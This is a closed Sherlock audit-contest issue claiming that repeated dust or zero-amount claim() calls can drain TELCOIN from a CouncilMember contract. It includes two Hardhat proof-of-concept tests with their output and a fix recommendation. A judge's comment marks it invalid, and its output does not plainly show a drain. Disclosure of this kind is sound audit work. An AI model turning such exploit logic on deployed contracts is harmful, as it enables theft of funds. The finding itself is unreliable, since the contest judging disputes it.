Closed sherlock-admin2 closed 9 months ago
CL001
high
TELCOIN can be drained if members claim() dust amount

Summary

TELCOIN can be drained because the claim() method allows the withdrawal of the dust balance.

Vulnerability Detail

poc 1

```js
describe("my poc", () => {
  it("test claim", async () => {
    // mint one council NFT each to member (tokenId 0) and support
    await councilMember.mint(member.address);
    await councilMember.mint(support.address);
    // 100 zero-amount claims on tokenId 0
    for (let i = 0; i < 100; i++) {
      await expect(councilMember.connect(member).claim(0, 0)).to.not.be.reverted;
    }
    // then a single claim of 5000 on the same token
    await expect(councilMember.connect(member).claim(0, 5000)).to.not.be.reverted;
    console.log("member telcoin balance:", await telcoin.balanceOf(member.address));
    console.log(await telcoin.balanceOf(await councilMember.getAddress()));
  });
});
```

Output:

```
my poc
member telcoin balance: 5000n
5200n
```

poc 2

```js
describe("my poc", () => {
  it("test claim", async () => {
    // mint one council NFT each to member (tokenId 0) and support
    await councilMember.mint(member.address);
    await councilMember.mint(support.address);
    // 500 claims of 20 on tokenId 0
    for (let i = 0; i < 500; i++) {
      await expect(councilMember.connect(member).claim(0, 20)).to.not.be.reverted;
    }
    console.log("member telcoin balance:", await telcoin.balanceOf(member.address));
    console.log(await telcoin.balanceOf(await councilMember.getAddress()));
  });
});
```

Output:

```
my poc
member telcoin balance: 10000n
40100n
```

Impact

Because a council member can freely get more than their share, TELCOIN can be drained.

Code Snippet

https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L92

https://github.com/sherlock-audit/2024-01-telcoin/blob/0954297f4fefac82d45a79c73f3a4b8eb25f10e9/telcoin-audit/contracts/sablier/core/CouncilMember.sol#L267

Tool used

Manual Review

Recommendation

Redesign the claim() method and the _retrieve() method, tracking the amount that has been claimed by members, or limit the use of the _retrieve() method.

Duplicate of #23
1 comment(s) were left on this issue during the judging contest.
takarez commented:
invalid because { there is no clear impact mentioned and the report is poorly written}